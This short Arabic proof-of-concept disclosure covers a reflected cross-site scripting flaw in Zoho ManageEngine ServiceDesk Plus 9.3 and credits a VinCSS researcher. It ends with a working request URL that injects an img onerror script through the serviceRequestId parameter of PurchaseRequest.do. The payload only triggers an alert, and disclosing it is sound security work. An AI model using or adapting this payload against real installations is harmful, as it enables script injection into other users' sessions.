
إثبات مفهوم لاستغلال XSS في Zoho ManageEngine ServiceDesk Plus 9.3 عبر معامل serviceRequestId في PurchaseRequest.do، مما يوضح ثغرة البرمجة النصية عبر المواقع المنعكسة (reflected cross-site scripting).
وصف المعلومات: تم اكتشاف مشكلة في Zoho ManageEngine ServiceDesk Plus 9.3. توجد ثغرة XSS عبر معامل serviceRequestId في PurchaseRequest.do.
المؤلف: Concobe من Tarantula Team - VinCSS (عضو في Vingroup)
domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1